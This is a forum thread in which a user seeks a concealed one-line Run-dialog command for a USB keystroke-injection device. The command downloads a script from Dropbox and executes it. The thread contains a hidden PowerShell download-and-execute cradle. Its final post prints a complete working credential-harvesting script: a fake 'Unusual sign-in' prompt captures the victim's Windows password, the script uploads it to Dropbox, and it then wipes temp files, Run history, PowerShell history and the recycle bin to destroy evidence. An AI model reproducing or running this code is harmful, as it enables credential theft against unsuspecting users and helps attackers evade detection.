Jump to content

[HELP] Execute a powershell command through 'RUN' which runs a .vbs file located in a dropbox


Recommended Posts

Posted

I've got a powershell command here that does everything I want it to, but it only works for .ps1 files. 
"powershell -w h -c "iex ([Text.Encoding]::UTF8.GetString((iwr 'https://DROPBOX-LINK' -UseBasicParsing).Content))"
 

Been trying to find a command that is as concise as this that works for .vbs file, but cannot seem to find anything. 
Any help on how to create a command that has the same functionality as the .ps1 version, but for .vbs would be greatly appreciated!  

Posted

Just a bit confused about the use case here.

What is the reason to why PowerShell can't be used on the target? Blocked? (Sounds a bit odd that PowerShell isn't allowed, but VBS is)

As I understand it you are trying to obtain the byte code of a string from a source on Dropbox, and this is what's puzzles me. Why cross the stream for water? Why obtain a byte/hex based source from the internet, convert it to text, and then run the command that the text represents when the Ducky is already available on the target and able to type strings? Why download it as hex/byte and then convert it to text? In need of some sort of obfuscation? There must be reasons to this, but as long at it's "black box", it's a bit difficult to suggest a valid alternative.

A thing that adds to the confusion is the title of the thread; "Execute a powershell command through 'RUN' which runs a .vbs file located in a dropbox". Why avoid using PowerShell (and use VBS) if it still is PowerShell that initiates it all? That means PowerShell isn't blocked. Might be monitored though, but in that case vbs could be as well, otherwise somethings wrong in the cybersec design/architecture of the environment at hand.

Posted

Thank you for your response,

I got a PowerShell script on Dropbox that I require to be run on hidden, without displaying any windows. I cannot run the entire PowerShell script through Ducky as it is quite long, due to that reason it would take a lot of time to input the entire script. I’ve found that receiving the script outside of the Ducky would prove more efficient. 

Initially, I attempted to run the PowerShell script on my dropbox through a PowerShell command which I couldn’t get working without some kind of window popping up. As a workaround, I decided to experiment running the script with VBS which ended up working perfectly. 

Now, I’m trying to get a command to run a VBS script on my dropbox, which then runs a PowerShell script on my dropbox (great workaround I know.) I need the command to be relatively short and in one-line so I can execute it directly from ‘run’ which is the fastest method. 

Hope that gives you a better idea of where I am at. 
 

 

Posted

I don't fully get the "run a VBS script on my dropbox" or "runs a PowerShell script on my dropbox". You can't execute things *on* Dropbox. You can of course obtain (download) things from Dropbox, but they have to be executed on the target device, not on Dropbox.

Looking at you previously posted "one-liner", I see that you execute PowerShell with "-w h" that is supposed to hide the PS window. But I guess that it's not enough for you since PowerShell pops up anyway for a short while and isn't actually fully hidden/stealth. Is that correct, or is the PowerShell window visible to you in any form during execution (i.e. for a longer while than just flashing up and then goes away)?

However, you will most likely have issues to get it to execute totally silent. I mean, it won't be silent anyway since the Windows run dialog will show no matter what you try. The payload needs to trigger/kick off in some way, not sure how you would be able to pull that off without having something that ignites it all. You could try various lolbins and see if they can download and execute things all stealth, but I don't think so, most will pop up something that will be visible.

Posted

Yes I meant downloaded from dropbox, and run on the target device. 
The issue I encounter when I run it with PowerShell using “-w h” is that PowerShell minimises after the command is run, but never closes. (You can simply click on it to bring it back up.) This is not about the .ps1 script but rather the command that initiates it from what I can understand, as this does not happen when it’s run with VBS. 

To put it in simpler words, running the .ps1 file directly with PowerShell causes the following: Run window flashes, a powershell window appears and minimises, but never closes until the .ps1 script is complete. 

None of those happen when the script is run with the VBS file. 
I’m not quite sure why the PowerShell command causes the .ps1 file to execute with a visible window. 
I could attach the code behind my .ps1 file I’m trying to execute if you’d like? It could help you get a better understanding on why that might be happening.

Posted

The script below generates a "Unusual login" prompt asking the victim for their password. 
(This is a slightly modified version of Jackoby's Rubber Ducky "Credz-Plz" script.)

$DropBoxAccessToken = ""
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
<#
.NOTES 
    This generates the ui.prompt to harvest the credentials
#>
function Get-Creds {
do{
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
   if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) {
    [System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
    Get-Creds
}
$creds = $cred.GetNetworkCredential() | fl
return $creds
  # ...
  $done = $true
} until ($done)
}
<#
.NOTES 
    This pauses the script until mouse movement is detected
#>
function Pause-Script{
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
$o=New-Object -ComObject WScript.Shell
    while (1) {
        $pauseTime = 3
        if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
            break
        }
        else {
            $o.SendKeys("{CAPSLOC}");Start-Sleep -Seconds $pauseTime
        }
    }
}
# This script repeadedly presses the capslock button (OUTDATED, IGNORE!) 
# This function makes sure that capslock is turned off before ui.prompt appears
function Caps-Off {
Add-Type -AssemblyName System.Windows.Forms
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
#If true, toggle CapsLock key, to ensure that the script doesn't fail
if ($caps -eq $true){
$key = New-Object -ComObject WScript.Shell
$key.SendKeys('{CapsLock}')
}
}
<#
.NOTES 
    This freezes the function until mouse movement is detected, in which after it activates the pop-up 
#>
Pause-Script
Caps-Off
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.MessageBox]::Show("Unusual sign-in. Please authenticate your Microsoft Account")
$creds = Get-Creds
<#
.NOTES 
    This saves the gathered credentials to a file in the temp directory
#>
echo $creds >> $env:TMP\$FileName
<#
.NOTES 
    This uploads the gathered credentials file to the dropbox
#>
$TargetFilePath="/$FileName"
$SourceFilePath="$env:TMP\$FileName"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
<#
.NOTES 
    This removes most traces of you, and evidence to prove you were there 
#>
# Deletes contents of Temp folder 
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Deletes run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Deletes powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...